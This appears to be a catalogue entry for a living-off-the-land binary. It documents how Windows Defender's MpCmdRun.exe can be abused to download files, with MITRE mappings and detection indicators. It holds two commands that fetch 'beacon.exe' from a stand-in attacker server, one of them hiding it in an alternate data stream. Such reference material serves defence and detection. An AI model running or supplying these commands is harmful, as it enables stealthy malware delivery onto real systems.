---
Name: MpCmdRun.exe
Description: Binary part of Windows Defender. Used to manage settings in Windows Defender
Author: 'Oddvar Moe'
Created: '09/03/2020'
Commands:
  - Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\beacon.exe
    Description: Download file to specified path
    Usecase: Download file
    Category: Download
    Privileges: User
    MitreID: T1105
    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
    OperatingSystem: Windows 10
  - Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\nicefile.txt:evil.exe
    Description: Download file to machine and store it in Alternate Data Stream
    Usecase: Hide downloaded data inton an Alternate Data Stream
    Category: ADS
    Privileges: User
    MitreID: T1096
    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
    OperatingSystem: Windows 10
Full_Path:
  - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.4-0\MpCmdRun.exe
  - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.7-0\MpCmdRun.exe
  - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe
Code_Sample: 
  - Code: 
Detection: 
  - IOC: MpCmdRun storing data into alternate data streams.
  - IOC: MpCmdRun getting a file from a remote machine or the internet that is not expected.
Resources:
  - Link: https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/command-line-arguments-microsoft-defender-antivirus
  - Link: https://twitter.com/mohammadaskar2/status/1301263551638761477
Acknowledgement:
  - Person: Askar
    Handle: '@mohammadaskar2'
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
---